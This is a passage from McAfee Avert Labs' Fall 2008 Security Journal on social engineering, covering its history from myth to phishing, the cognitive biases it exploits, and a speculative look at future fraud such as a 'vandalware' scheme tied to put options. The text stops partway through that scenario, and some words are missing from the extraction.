
Security Vision from McAfee® Avert® Labs Fall 2008

Social Engineering: The World’s Leading Security Threat

Trojans, click , and money appeals are just a few of the vectors that help writers take advantage of Internet users

McAfee Security Journal Fall 2008

Editor
Dan Sommer

Contributors
Anthony Bettini, Hiep Dang, Benjamin Edelman, Elodie Grandjean, Jeff Green, Aditya Kapoor, Rahul Kashyap, Markus Jacobsson, Karthik Raman, Craig Schmugar

Statistics
Toralv Dirro, Shane Keats, David Marcus, François Paget, Craig Schmugar

Illustrator
Doug Ross

Design
PAIR Design, LLC

Contents

4 The Origins of Social Engineering
From Odysseus’ Trojan horse to on the Internet: just won’t go away. By Hiep Dang

9 Ask and You Will Receive
The psychology of social engineering: Why does it work? By Karthik Raman

13 Social Engineering 2.0: What’s Next
appears one of the most likely threats that we’ll face in the near future. By Markus Jakobsson

16 The Beijing Olympics: Prime Target for Social Engineering Malware
The five rings, and other major events, are an irresistible attraction for malware authors. By Elodie Grandjean

22 Vulnerabilities in the Equities Markets
Can hackers make money from Patch Tuesday and other company news? By Anthony Bettini

28 The Future of Social Networking Sites
Lots of money and users make social sites another magnet for malware. By Craig Schmugar

31 The Changing Face of Vulnerabilities
Social engineering tricks can lead users into holes in software. By Rahul Kashyap

34 Typosquatting: Unintended Adventures in Browsing
Incautious web browsing can lead to the unexpected. By Benjamin Edelman

38 Whatever Happened to Adware and Spyware?
Tougher laws may have tamed adware, but PUPs and Trojans remain. By Aditya Kapoor

44 Statistics
How risky are top-level domains? By David Marcus

Acknowledgements
Many people helped create this issue of the McAfee Security Journal. We would like to cite a number of the key contributors: the senior executives at McAfee, Inc. and McAfee Avert Labs who have supported this creation; our review board—Carl Banzhof, Hiep Dang, David Marcus, Craig Schmugar, Anna Stepanov, and Joe Telafici; our authors and their managers and teammates who have supported them with ideas and comments; marketing mavens Cari Jaquet, Mary Karlton, Beth Martinez, and Jennifer Natwick; public relations pros Joris Evers, his worldwide team, and Red Consultancy Ltd.; our design agency, Pair Design; our printer, RR Donnelley; and Derrick Healy and his mates in our Cork, Ireland, localization office, which has translated this publication into many languages. Thanks to all; we couldn’t have achieved this without you!

Dan Sommer Editor

Like it? Hate it? Send your comments to Security_Journal@.com.

‘McAfee Security Journal’ Debuts

By Jeff Green

Welcome to the first issue of the McAfee Security Journal. We call this a first issue, but we’re not really producing this publication for the first time. We have renamed the journal that we have, until recently, called (depending on the country you read it in) McAfee Sage or the McAfee Global Threat Report. In the McAfee Security Journal, you’ll find the same outspoken attitude as well as all the dynamic content you have come to expect from the best researchers and authors in research: the experts at McAfee® Avert® Labs. In this issue, we take at the most insidious and pervasive of all threat vectors—social engineering.

Free Tibet! New images of World War 3! IRS Tax Break Secrets! New Gas Saving Technologies! Cheap Medication Online!

The list could easily go on, but we hope the point is clear. Effective and seductive messaging is critical to the success of malware writers and identity thieves today, and more so now than ever before. Social engineering, however, as a method of bilking someone is certainly not new. It has existed since humans have been communicating with one another. You have something I want. I want to talk you into giving it to me or into doing something I want you to do. Social engineering is possibly the most difficult of all threats to combat due to the human element. The easiest way to steal someone’s identity might just be to ask for it. Social engineering techniques—Ponzi schemes, confidence tricks, pyramid schemes, simple fraud, phishing, or spam—all follow similar paths. Some of these attacks are physical, while others are digital, but all have elements in common. They have the same aim and in many cases may even use the same techniques. The goal of them all is to manipulate victims through a “bug” in the human hardware. They all create scenarios that are designed to persuade victims to release information or perform an action.

We have assembled another outstanding collection of researchers and authors to analyze and illustrate this topic for you. We’ve even broken new ground for our journal: this issue marks the first time we have guest contributors. We start with two of the finest: Dr. Markus Jacobsson of the Palo Alto Research Center and Professor Benjamin Edelman of the Harvard Business School.

We kick off with a look back at the history of deception. Then we peer into the psychology of why these attacks work. Next we look ahead to how social engineering might evolve during the next few years. The 2008 Olympics in Beijing have ended, but malware authors once again attempted to fool sports fans into visiting bogus web sites. Is it possible to make money in the stock market by timing events such as Microsoft’s Patch Tuesday or spoofing company news? Our extensive research will offer an answer. What’s next with social networking sites? Will security tighten up, or are they doomed to be easy targets because of overly trusting users? We’ll also look at how malware writers attack software vulnerabilities and take advantage of typosquatting—the exploitation of incorrectly typed web requests. Our final article will answer the question “Whatever happened to adware and spyware?” We’ll finish off with some statistics that show the varying degree of threats to top-level domains around the world.

We hope you find this issue as challenging and thought provoking as we do. Thanks for joining us once again as we journey into the depths of computer security.

Jeff Green is senior vice-president of McAfee Avert Labs and Product Development. He has worldwide responsibility for McAfee’s entire research organization, located throughout the Americas, Europe, and Asia. Green oversees research teams focused on viruses, hacker/targeted attacks, spyware, spam, phishing, vulnerabilities and patches, and host and network intrusion technologies. He also leads long-term security research to ensure that McAfee stays ahead of emerging threats.

The Origins of Social Engineering

By Hiep Dang

One would be hard pressed today to read a news article or book about computer security without coming across the term social engineering more than once.

Popularized by Kevin Mitnick (arguably the most infamous social engineer in the modern computing era), social engineering is in essence the art of —convincing individuals to disclose confidential data or perform some action. Although social engineering is a contemporary term, the techniques and philosophies behind it have been around as long as humanity itself. We find stories of deception and manipulation in the pages of history, folklore, mythology, religion, and literature.

Prometheus: The God of Social Engineering?

According to Greek mythology, humanity’s proficiency in social engineering today is probably a direct result of its greatest mentor: Prometheus, who was so skilled in this craft that he could trick Zeus, the king of gods. In Theogony and Works and Days, the epic poet Hesiod tells the story of Prometheus, a Titan known for his wily ways and cunning tricks. He is credited for the creation of man by molding him out of clay. In what became known as the “Trick at Mecone,” Prometheus offered Zeus two choices to settle a dispute between the gods and mortals. One offering was ox meat stuffed inside an ox’s stomach, the other was an ox bone covered with shining fat. One was nourishment wrapped in a vile covering while the other was an inedible choice, though visually tantalizing. Zeus chose the latter and, as a result, humankind would henceforth need to make sacrifices only of bones and fat to the gods, while keeping the flesh for themselves. Angered at being tricked by Prometheus, Zeus punished mortals by withholding fire. However, in yet another act of social engineering against Zeus, Prometheus stole “the far-seen gleam of unwearying fire in a hollow fennel stalk” from Mount Olympus and bequeathed it to man. As for his acts, Prometheus was chained to a rock, where every day an eagle would come and eat his liver, which would grow back again at night. As a punishment for man, Zeus created the first woman, Pandora, who brought with her a jar that she opened out of curiosity, releasing countless plagues.

Jacob and Rebekah’s Phishing Attack

From the Old Testament comes the story of Jacob and his mother, Rebekah, who used a social engineering technique that is the foundation of today’s phishing attacks—making the victim believe that the phisher is someone else. Jacob’s father and Rebekah’s husband, Isaac, had gone blind in the last years of his life. As he prepared for death, he instructed his oldest son, Esau, to “hunt game for me, and prepare for me savory food, such as I love, and bring it to me that I may eat; that I may bless you before I die.” (Genesis 27:2–4.) Wanting Jacob instead of Esau to receive Isaac’s blessings, Rebekah devised a plan. Jacob was reluctant at first, saying “Behold, my brother Esau is a hairy man, and I am a smooth man. Perhaps my father will feel me, and I shall seem to be mocking him, and bring a curse upon myself and not a blessing.” (Genesis 27:11–12.) In order to fool Isaac into believing he was with Esau, Rebekah prepared Isaac’s meal, dressed Jacob in Esau’s best garments, and attached a goat skin to the smooth parts of Jacob’s hands and neck. Jacob delivered the meal to Isaac, passed the authentication test, and successfully gained the blessings that had been intended for Esau.

Samson and Delilah: Espionage for Hire

Samson was a biblical figure with tremendous strength who battled the Philistines. The secret of his power was his long hair. While in Gaza, Samson fell in love with Delilah. The Philistines were able to convince her to uncover the secret of Samson’s strength by offering her 1,100 pieces of silver. “Coax him, and find out what makes his strength so great, and how we may overpower him, so that we may bind him in order to subdue him; and we will each give you eleven hundred pieces of silver.” (Judges 16:5.) Samson resisted disclosing his secret before succumbing to her persuasiveness. “How can you say, ‘I love you,’ when your heart is not with me?” she said. “You have mocked me three times now and have not told me what makes your strength so great.” Finally, after she had nagged and pestered him day after day, he gave in. So he said to her, “A razor has never come upon my head; for I have been a Nazirite to God from my mother’s womb. If my head were shaved, then my strength would leave me; I would become weak, and be like anyone else.” (Judges 16:15–17.) Soon after Samson fell asleep, Delilah exploited his vulnerability by shaving off his hair. In his weakened state, the Philistines seized Samson, gouged out his eyes, bound him in shackles, and imprisoned him for life.

The First Trojan Horse

The story of the Trojan horse, made famous by the Greek epic poet Homer in The Odyssey and the Roman epic poet Virgil in The Aeneid, was one of the most ingenious social engineering tricks in the history of humankind. During the Trojan War, the Greeks could not break down the walls surrounding the city of Troy. The crafty Greek warrior Odysseus devised a ruse to fool the Trojans into believing the Greeks had given up their assault on the city. The Greeks sailed their fleet of ships away and left only a large wooden horse on the beach with a lone Greek soldier named Sinon. After being captured by the Trojans, Sinon told them that the Greeks had left the large wooden horse as an offering to the Gods to ensure their safety as they traveled home and that they made it large enough so that the Trojans could not move it into the city—as this would bring the Greeks ill luck. The story was so tantalizing to the Trojans that they moved the wooden horse within the city walls—despite the warnings of Cassandra, who was cursed with the ability to foresee the future without anyone ever believing her, and of Laocoön, a Trojan priest, who said in The Aeneid:

O wretched countrymen! What fury reigns?
What more than madness has possess’d your brains?
Think you the Grecians from your coasts are gone?
And are Ulysses’ arts no better known?
This hollow fabric either must inclose,
Within its blind recess, our secret foes;
Or ‘t is an engine rais’d above the town,
T’ o’erlook the walls, and then to batter down.
Somewhat is sure design’d, by fraud or force:
Trust not their presents, nor admit the horse.

The Trojans’ poor judgment became their downfall. That night, led by Odysseus, the Greek soldiers hidden within the horse killed the guards and opened the gates to the rest of the army. Thanks to the ingenious social engineering tactic devised by Odysseus, the Greeks defeated the Trojans to win the war.

Today’s Trojan Horse

When Odysseus devised his scheme to infiltrate Troy, little did he know that he would set a precedent for millennia to come. The most prevalent type of malware found in the wild today, the silicon “Trojan horse” was coined by Daniel Edwards of the U.S. Government’s National Security Agency in the 1970s. Edwards named it after the social engineering technique used by the Greeks. Before the days of the Internet, personal computer users who wanted to share software files did so through physical media (such as floppy disks or tape drives) or by connecting to bulletin board systems (BBS’s). Hackers with malicious intent soon realized that they could entice users into executing malicious code simply by disguising it as a game or utility. Due to the simplicity and amazing effectiveness of Trojans, malware authors still use this social engineering technique decades later. Today, PC users are tricked into infecting themselves with Trojans at an alarming rate. They are drawn by the allure of free music, videos, software, and endearing ecards from anonymous “loved ones.”

Figure 1: Malware and PUP growth, unique families from 1997 to 2007, in thousands (series: viruses and bots, Trojans, PUPs; vertical axis 0 to 140). The frequency of malware and potentially unwanted programs in McAfee’s signature files has seen several spikes in the last decade. In 1998, virus generators came on the scene; in 2003 to 2004, mass mailers became popular; in 2004 to 2005, robot networks were on the rise; and in 2006 to 2007 Trojans took off.

An Updated Con

Advanced Fee Fraud, better known as the Nigerian Email Scam (419 Fraud), has been around for decades and is still one of the most prolific types of spam. The numeral “419” refers to the section of the Nigerian Criminal Code that outlaws this scam. This “get rich quick” social engineering tactic arrived in the form of a letter and was first delivered to postal mailboxes in the 1970s. The con evolved into unsolicited faxes through the 1980s, and it is almost exclusively sent via email today. Its origins date back to the sixteenth century, when it was known as the Spanish Prisoner Con. The scheme is straightforward: A naïve victim is told about an extremely wealthy prisoner who needs someone’s help in getting free. This so-called prisoner relied on the con artist to raise enough money to free him. The con artist approached the victim with the story and “allowed” him or her to help with a portion of the fundraising—with the promise of great financial gain. We see numerous variations of the letter today, but the concept remains the same. The Nigerian Email Scam lures its victims with the tantalizing promise of a multimillion-dollar payout with an “investment” of only a few thousand. Even though most recipients realize the offer is too good to be true, an estimated 1 percent of recipients still reply. According to the U.S. Secret Service, the scammers successfully social engineer their victims out of an average of $100 million per year.

Figure 2: Phishing reports, in thousands, November 2003 to November 2007 (series: unique phishing reports, new phishing sites; vertical axis 0 to 60). Phishing reports show steady growth, but the number of new phishing sites has jumped dramatically in the past two years. (Source: Anti-Phishing Working Group)

Phishing

The term phishing was coined by hackers. It derives from fishing because this social engineering technique lures its victims (phish) into disclosing their user names, passwords, credit card numbers, and other personal information. In the 1990s, many hackers exploited America Online’s (AOL) free trial offers of Internet service by using fake, autogenerated credit card numbers that didn’t actually correspond to existing accounts. After AOL improved its security and credit card validation tests to ensure that credit card numbers were indeed legitimate, the bad guys started going after real user names and passwords to get onto AOL’s networks. They started sending fake emails and instant messages that appeared to come from AOL support. Many unsuspecting victims gave away their information and were subsequently billed for the activities and purchases that the hackers made on their compromised accounts. Malicious hackers soon realized the potential profit margin and success rate of such an attack and started targeting companies (banks, eBay, Amazon, and others) that conducted transactions and commerce online.

Figure 3: Timeline of significant social engineering events (“History of computer security”), plotted against the years 1948, 1965, 1969, 1971, 1978, 1980, 1982, 1983, 1984, 1986, 1988, 1995, 1996, 2000, 2002, and 2008. Events shown on the figure:

• John von Neumann publishes his theory of Self-Reproducing Automata
• Electronic mail (email) is created
• ARPANET (precursor to the Internet) is created
• John Draper (aka Cap’n Crunch) discovers toy whistle in the cereal box can be used to phone phreak
• Creeper (the first computer virus) is released on ARPANET
• The first public Bulletin Board System (BBS) is set up
• Trojan Horses start showing up on BBS’s
• Elk Cloner (the first Apple virus) is released
• The movie “War Games” dramatizes the consequences of hacking
• The Internet is formed from ARPANET
• Dr. Frederick Cohen publishes “Experiments with Computer Virus” and credits Leonard Adleman with coining the term computer virus
• Brain (the first PC virus) is released
• The Morris Worm (the first self-replicating worm) is released
• Spam (unsolicited email) appears soon after the Internet was made available to the public
• McAfee Avert Labs became the industry’s first global AV Emergency Response Team
• The first phishing attack is devised to steal AOL user passwords
• Spyware and adware start to become a household name
• Kevin Mitnick publishes “The Art of Deception,” describing his mastery of social engineering
• Today, McAfee Avert Labs protects customers from viruses, worms, Trojans, spyware, PUPs, vulnerabilities, spam, phishing, malicious domains, network intrusions, and host intrusions

History Repeats Itself

Whether it’s called social engineering, trickery, confidence tricks, cognitive biases, or scams, the concept of exploiting a person’s naivety and trust is as prevalent today as it has been since the dawn of time. Ask security experts, and they will agree that people are the weakest link in the security chain. We can develop the most secure software to protect our computers, implement the most restrictive security policies, and strive for utopian user education. However, as long as we continue to be driven by curiosity and greed without concern for the consequences, we could face our own version of a Trojan tragedy.

Progress, far from consisting in change, depends on retentiveness. When change is absolute, there remains no being to improve and no direction is set for possible improvement: and when experience is not retained, as among savages, infancy is perpetual. Those who cannot remember the past are condemned to repeat it.—George Santayana, in “Reason in Common Sense,” from The Life of Reason.

Hiep Dang is the Director of Anti-malware Research for McAfee Avert Labs. He is responsible for the coordination of McAfee’s global team of malware researchers dedicated to the research, analysis, and response to malware outbreaks, including viruses, worms, Trojans, bots, and spyware. Dang is a regular contributor to Avert Labs blogs and white papers and writes for the McAfee Security Journal. He has been interviewed by the Wall Street Journal, MSNBC, PC Magazine, and many other publications and media outlets about new threats and malware trends. Dang is also a devoted practitioner of Wah Lum Tam Tui Northern Praying Mantis Kung Fu and Tai Chi. He is currently on a hiatus from his lifetime of training to concentrate on the computer security industry.

Works cited

• Anderson, J. P. (1972). Computer Security Technology Planning Study vol. II. U.S. Air Force.
• Farquhar, M. (2005). A Treasury of Deception. New York: The Penguin Group.
• Hesiod (1914). Theogony. (Translated by H. G. Evelyn-White)
• Hesiod (1914). Works and Days. (Translated by H. G. Evelyn-White)
• Homer. The Iliad. (Translated by S. Butler)
• Mitnick, K. (2002). The Art of Deception. Indianapolis, Indiana: Wiley Publishing.
• Myers, M. J. (2007). Phishing and Countermeasures. John Wiley & Sons, Inc.
• Santayana, G. (1905). The Life of Reason.
• Virgil (19 B.C.E.). The Aeneid. (Translated by J. Dryden)

Ask and You Will Receive

By Karthik Raman

In January 2007, cybercriminals used social engineering tactics to carry out the world’s biggest online theft on record, stealing US $1.1 million from customers of the Swedish Nordea Bank.

Customers received an email that appeared to have originated from Nordea Bank, and 250 of them downloaded and installed the “anti-spam” software that the email asked them to set up. The anti-spam software was in fact a Trojan that collected customer information, which the criminals used to log into the bank’s web site and steal money.1

A well-known information security principle is that in any security system, people are the weakest link. Although security attacks and the defenses developed to respond to those attacks continue to evolve, human nature remains unchanged. To an attacker, social engineering is more efficient and brings quicker returns than a brute-force assault on encryption algorithms, fuzzing to find new software vulnerabilities, or adding complexity to malware. In the Nordea Bank fraud, it was easier for criminals to ask the bank’s customers to install a Trojan than to break into a vault to steal cash.

We are gullible, greedy, and curious, which means social engineers can manipulate our feelings and thoughts. They ask us for something, and very often they receive it. But why do we behave this way?

In pioneering work on the psychology of security, renowned security expert Bruce Schneier identified four research areas—behavioral economics, psychology of decision-making, psychology of risk, and neuroscience—that can help explain why our feeling of security deviates from reality.2 This edition of the McAfee Security Journal and this article in particular focus on one aspect of security: social engineering. In this discussion, we shall draw from neuroscience, the psychology of decision making, and elementary social psychology to analyze why people fall for social engineering without perceiving the deception.

A Tale of Two Brains

The human brain is arguably the most complex system in the universe. Part of its complexity lies in its complicated layout and convoluted interaction of subsystems.

In the brain, emotions seem to arise from the older, inner parts, such as the amygdala, and reasoning from newer, outer parts, such as the neocortex.3 But the seats of emotion and reason are not mutually exclusive, as Isaac Asimov observed in his book The Human Brain:4

Emotions do not arise from any one small part of the brain, it would appear. Rather, many parts, including the frontal and temporal lobes of the cortex, are involved—in a complex interplay.

The parts of the brain responsible for emotion and reason can sometimes work with or against one another. That is why it is hard for us to keep reason and emotion separate, and why it is easy for emotion to override reason when the two contradict one another.

Let’s look at how we deal with fear, for example. Examining how we react to imminent danger, science writer Steven Johnson points out that the fear response is “an orchestral mix of physiological instruments launching with masterful speed and precision”:5

We talk about it colloquially as the fight-or-flight response. Feeling it kick in is one of the best ways to experience your brain and body as an autonomous system, operating independently of your conscious will.

When revisited by the conditions that led to a fight-or-flight response in the past, we allow the emotional response to take over even though we can reason objectively that the response is without merit. Dishonest politicians, spies, and con men know that appealing to emotion—fear especially—to elicit an emotional response is a very effective means to their ends. Social engineers continue that tradition.

Theories of Social Engineering

Manipulating emotions

Many social engineers zero in on the emotions of fear, curiosity, greed, and sympathy. It is well-established that these are universal emotions; from time to time everyone feels afraid or curious or greedy or sympathetic.

Fear and curiosity are useful in many situations. Escaping a burning building is a good thing. Curiosity can help us challenge ourselves and learn something new. Still, acting out of fear or curiosity can cause us to do dangerous or undesirable things.6 Some attacks can be carried out even without the presence of the social engineer by manipulating a victim’s curiosity. In April 2007, a banking Trojan planted in USB drives was left in a London parking lot. People who were curious to see what these drives contained and likely glad to become owners of a free storage device, plugged the drives into their computers only to infect them with malware.7

Attackers who threaten or blackmail victims manipulate their fear. The GPCoder.i Trojan, which appeared in June 2008, is an example of malware that manipulated fear: it encrypted users’ files and demanded a ransom for their decryption.8 Likewise, attackers who bribe victims manipulate their greed, and attackers who pose as needing help manipulate their sympathy.

Misdirected mental shortcuts

Sometimes social engineers will appeal to something outside of our emotions. They’ll try to trip up our mental rules for processing information. We call these rules heuristics, or rules of thumb.

Although we must recognize that our heuristics are fallible, we cannot function without them. Our lives would be too difficult if we had to think through everything we perceived, said, and did. We desperately need our mental shortcuts. Psychologist Robert Cialdini explains this need:9

We can’t be expected to recognize and analyze all the aspects in each person, event, and situation we encounter in even one day. We haven’t the time, energy, or capacity for it. Instead, we must very often use our stereotypes, our rules of thumb, to classify things according to a few key features and then to respond mindlessly when one or another of these trigger features is present.

Let’s see how social engineers can elicit automatic responses in us that work for them.

Triggering cognitive biases

A cognitive bias is a mental error caused by a simplified information-processing strategy.10 When a heuristic goes wrong, it becomes a bias. Social engineers nudge our heuristics into “severe and systematic” errors.11

Here are a few cognitive biases that can explain social engineering:

• Choice-supportive bias People will remember an option of their choosing in the past as having more positive than negative aspects.12 An online shopper could get used to purchasing discounted items on the Internet using referrals from friends. An occasional spam email could seem like another referral and lead the shopper into disclosing credit card information to a fraudulent web site.
• Confirmation bias People will collect and interpret evidence in a way that confirms their views.13 Let’s take a hypothetical example. Suppose Acme Corporation contracts with Best Printers to maintain its printers, and all Best Printer service people wear gray, full-sleeved shirts with name badges. Over time, Acme’s employees will get used to seeing Best Printers

service people in their uniforms and will identify anyone with gray, full-sleeved shirt with a badge as a custodian. A social engineer could fabricate or steal a Best Printers uniform to pose as a service person. The social engineer may not be challenged to identify himself because of the Acme employees’ confirmation bias.
• Exposure effect People like things (and other people) according to how familiar they are with them.14 News of natural and man-made disasters often spawn phishing web sites that exploit this sentiment.15 People exposed to such news could be enticed easily into visiting phishing web sites that claim to have a connection with the news. Finally, people’s exposure to the news might have lowered their guard with respect to the malicious nature of the web site they are visiting.
• Anchoring People focus on an identifying trait that is first apparent when they make decisions about something.16 A spoofed bank web site that prominently displays the actual bank’s logo might deceive users even if other security indicators scream out the deception.17

Causing errors in schemas

Social psychologists define a “schema” as the picture of reality we refer to, so that we can draw conclusions about our environment. As children, we learn that being nice to others is a good thing. The notorious social engineer Kevin Mitnick has remarked that attackers know this and craft a request to victims to “sound so reasonable that it raises no suspicion, all the while exploiting the victim’s trust.”18 Thus, social engineers abuse the design of our social schema.

Here’s a list of common social errors or judgments that people make, with illustrations of how social engineers exploit them:

• Fundamental attribution error People will assume that the behaviors of others reflect their stable, internal characteristics.19 This is the error of mistaken first impressions. A social engineer will train diligently to make a favorable first impression. Attackers could act personable when making requests or act domineering when coercing victims into doing something. Victims may not realize that their interlocutors are actors and that their behavior is situational—a means to an end.
• Salience effect Given a group of individuals, people will guess that the most or least influential person is the one who stands out the most.20 Social engineers are expert at fitting into their surroundings and blending in. They strive to flip the salience effect to their favor. They might pose as a client in a business suit or a custodian in overalls, but not as a juggler on stilts. Blending in is not limited to clothing and appearance—it can extend to knowledge of company lingo, events, employees, and even regional accents. A social engineer from California trying to breach a company in Boston may know about “Jill’s” new baby and “Josh’s” leaving the company for a competitor and may exchange this with the receptionist in a Boston accent to be allowed into the office for “IT repairs.”
• Conformity, compliance, and obedience People respond to the pressures of conformity, compliance, and obedience by changing their behavior. Many social engineering attacks can be explained by victims’ predictable responses to these pressures. A social engineer might pretend to be a visiting executive and prevail upon a young security guard to let her enter the premises in spite of the fact that she is not wearing a badge. (The attacker’s promise of reward or threat of punishment may further pressure the guard.) The guard may feel overwhelmed and will obey. Group social engineering attacks have not been observed, but they are conceivable. A number of social engineers might pose as legitimate employees and nag a receptionist to gain entry into an office by repeating “Don’t waste our time” or “Let us get back to our work.” The receptionist might just let them in to avoid being unpopular. A different technique that spies are known to use is to socialize with a victim for a while. The attacker at first requests innocent information from the victim and then moves onto sensitive information. The victim is trapped; he is pressured to comply with the next request, given his history of compliance, or risks a form of blackmail.

FALL 2008 11

Conclusion

Our susceptibility to social engineering is rooted in the design of the human brain, in the complex interplay between the centers of emotion and reason. Social engineering is the manipulation of a victim's fear, curiosity, greed, or sympathy. Cognitive biases and errors in our social schemas help explain social engineering's success. So why is this knowledge so valuable to us?

In the 2007 CSI Computer Crime and Security Survey, only 13 percent of respondents said they had checked how effective their employees' training was against social engineering attacks.21 Although 13 percent is a low figure, the survey did not include those respondents who did not have any training program for social engineering attacks.

One obvious step is to create and improve security policies and user education programs about social engineering. Any policy on social engineering will be more persuasive if it uses scientific research to justify itself. User education materials will also be more effective if they list the cognitive biases that social engineers generally exploit, and training videos will be more effective if they demonstrate attacks that exploit each of our cognitive biases.

We can't change human nature. We are born with a split between our emotions and reason, and are prone to committing mental errors. This is normal, but such behavior is dangerous when exploited by social engineers. By understanding the psychology of social engineering and training users about its effects, we can defend against these attacks with greater success.

Karthik Raman, CISSP, is a Research Scientist at McAfee Avert Labs. His research interests in security include vulnerability analysis, network security, and software security. Beyond security, his interests include the cognitive and social sciences and computer programming. For fun, Raman plays cricket and the guitar and learns languages. Raman graduated with B.S. degrees in computer science and computer security from Norwich University (Vermont) in 2006.

endnotes

1 "Bank loses $1.1M to online fraud," BBC (2007). http://news.bbc.co.uk/2/hi/business/6279561.stm
2 Schneier, B. "The Psychology of Security," Essays and Op Eds (2007). http://www.schneier.com/essay-155.html
3 Ibid.
4 Asimov, I. "The Human Brain: Its Capacities and Functions." New York: Mentor Books, 1965.
5 Johnson, S. "Mind Wide Open: Your Brain and the Neuroscience of Everyday Life." New York: Scribner, 2004.
6 Svoboda, E. "Cultivating curiosity; how to explore the world: Developing a sense" today.com/articles/index.php?term=pto-4148.html
7 Leyden, J. "Hackers debut malware loaded USB ruse," The Register (2007). http://www.theregister.co.uk/2007/04/25/usb_malware/
8 McAfee VIL: GPCoder.i, June 9, 2008. http://vil.nai.com/vil/content/v_145334.htm
9 Cialdini, R. "Influence: The Psychology of Persuasion." New York: HarperCollins, 1998.
10 Heuer, Richard J., Jr. "The Psychology of Intelligence Analysis," Center for the Study of Intelligence, CIA (2002). http://www.au.af.mil/au/awc/awcgate/psych-intel/art12.html
11 Tversky, A. and Kahneman, D. "Judgment under uncertainty: Heuristics and biases," Science, 185, 1124-1130 (1974). http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf
12 Mather, M., Shafir, E., and Johnson, M. K. "Misremembrance of options past: Source monitoring and choice," Psychological Science, 11, 132-138 (2000). http://www.usc.edu/projects/matherlab/pdfs/Matheretal2000.pdf
13 Nickerson, R. S. "Confirmation Bias: A Ubiquitous Phenomenon in Many Guises," Review of General Psychology, Vol. 2, No. 2, 175-220 (1998). http://psy.ucsd.edu/~mckenzie/nickersonConfirmationBias.pdf
14 Zajonc, R. B. "Attitudinal Effects of Mere Exposure," Journal of Personality and Social Psychology, 9, 2, 1-27 (1968).
15 Kaplan, D. "Virginia Tech massacre may spawn phishing scams," SC Magazine (2007). http://www.scmagazineuk.com/Virginia-Tech-massacre-may-spawn-phishing-scams/article/105989/
16 Tversky, A. and Kahneman, D. "Judgment under uncertainty: Heuristics and biases," Science, 185, 1124-1130 (1974).
17 Dhamija, R., Ozment, A., and Schechter, S. "The Emperor's New Security Indicators: An evaluation of website authentication and the effect of role playing on usability studies" (2008). http://www.usablesecurity.org/emperor/
18 Mitnick, Kevin D. and Simon, William L. "The Art of Deception." Indianapolis: Wiley Publishing, Inc., 2002.
19 Gilbert, D. T. and Malone, P. S. "The correspondence bias," Psychological Bulletin, 117, 21-38 (1995). http://www.wjh.harvard.edu/~dtg/Gilbert%20&%20Malone%20(CORRESPONDENCE%20BIAS).pdf
20 Taylor, S. E. and Fiske, S. T. "Point of view and perceptions of causality," Journal of Personality and Social Psychology, 32, 439-445 (1975).
21 Computer Security Institute, CSI Computer Crime and Security Survey (2007). http://www.gocsi.com/forms/csi_survey.jhtml (registration required)

Social Engineering 2.0: What's Next

By Markus Jakobsson

Although social engineering has probably been around since the dawn of human civilization, many are concerned that it is currently transforming and wreaking havoc on the Internet. In this article, we’ll offer some predictions about what may come next.

Few would disagree that the current crimeware wave is fed by economic incentives. The current state of affairs stands in stark contrast with the past. Early viruses were simply an expression of intellectual curiosity, competitiveness, and maybe a bit of ennui. The case is even clearer as we turn to click fraud and phishing. What other possible motivation is there other than to make a shady buck or two? (Or often a whole lot more.) The same holds for spam in its various forms. If spammers couldn't make money from it, there would be no spam. It is, therefore, rational to consider the ways that criminals can monetize abuses of existing Internet features so that we can predict trends in fraud.

Internet Fraud: A Socio-Technical Crime

An increasing number of experts recognize that fraud is no longer only a technical matter, but that to an increasing extent there is also a social engineering component. Phishing is a prime example of this, but not the only one. It is more and more common these days to see crimeware attacks that hinge on social engineering for installation. A recent example of this is the so-called Better Business Bureau scam, shown in Figure 1. In this phishing attack, a potential victim receives an email appearing to come from the Better Business Bureau and relating to a case against the organization of the recipient. The attachment, which supposedly contains the details of the complaint, in reality contains a Trojan downloader. To make matters worse, these emails are often sent to people high up in the targeted organization—often to individuals who deal with customer complaints on a daily basis.

Defenses Shape Attacks

From the point of view of criminals, Internet fraud is a relatively safe and comfortable crime. Apart from being a crook's telecommuting dream, Internet fraud offers scalability, high profits, and very low traceability—and thus very limited risk. It is no wonder that Internet fraud has taken off. Now, to understand the attacks, we must also understand the defenses. It is clear that the crimes are being fought on three separate planes today: technical features (such as anti-virus software, spam filters, and anti-phishing browser plug-ins); educational campaigns (such as those run by the FTC, eBay, SecurityCartoon.com, banks, and the Carnegie Mellon University Usable Privacy and Security Laboratory (CUPS) group); and finally, legal means. The legal efforts typically involve tracking origination, raiding drop boxes, and finally, prosecuting offenders.

Whereas the technical and educational efforts—if successful—result in a lower yield to criminals, the legal efforts result in a higher risk. These risks are a big deal, especially given how well Internet fraud scales. It is, therefore, fair to assume that the next frontier in Internet crime will involve a component that makes it less traceable. We will make that assumption here, and investigate what that could mean for the future. We will do this by considering two types of highly untraceable attacks, neither of which has occurred to date, but both of which are waiting to happen. But first, to truly understand the importance of the legal aspect, we will take a slight tangent and review why "ransomware" never became the calamity people thought it would be.

Ransomware Fails

In the late 1990s, researchers at Columbia University posited that the next wave of malware might attempt to hold the files on the victim's computer hostage by encrypting them using a public key carried in the malware body and demand a ransom to get the secret key—to regain access to the encrypted files. Years later, the Archiveus Trojan carried out an attack just like that, although with a small difference: it used symmetric-key cryptography instead of a public key. The attack was foiled when the Trojan was reverse engineered and the encryption/decryption key was extracted and distributed to anybody who was attacked. But maybe the Archiveus attack would not have succeeded even if it had used public-key cryptography (which, by its nature, would have prevented anyone from reverse engineering the decryption key out of the code, since the private key would never be contained there in the first place). The reason Archiveus might have failed is not technical, but lies in the monetization aspect: there was no way the criminals could have safely collected the ransom without being traced.

Vandalware Strikes

With the ransomware example in mind, let us now consider a new type of attack, which we can call vandalware. This attack does not carry out vandalism for fun or defiance, but rather for profit. Here is what the criminal would do: first, he or she would select a company to target, and use data-mining techniques to get as much detailed information as possible about vulnerable employees. By vulnerable employee, we mean an employee with access to sensitive data or access to the web page façade of the company. From the vulnerable employee, a vandal might learn about the internal structure of the company, the names of key employees, and the format of email addresses. Second, the criminal would buy put options for that company. (We are assuming that it is a publicly traded company.) A put option is a financial instrument that increases in value if the corresponding stock falls in price; investors and speculators use put options to turn a profit from an insight that a given stock is soon to lose value. Most likely, other investors, not just the criminal, would also buy put options, especially if the stock of the targeted company has a reasonable trading volume. Third, the criminal would unleash an attack against the company, perhaps by sending selected employees spoofed email appearing to come from another employee, such as their boss: "Hi Jim. Please take a look at the attached PowerPoint slides and let me know what you think. If possible, I'd like a quick assessment by tomorrow morning. Hope you can 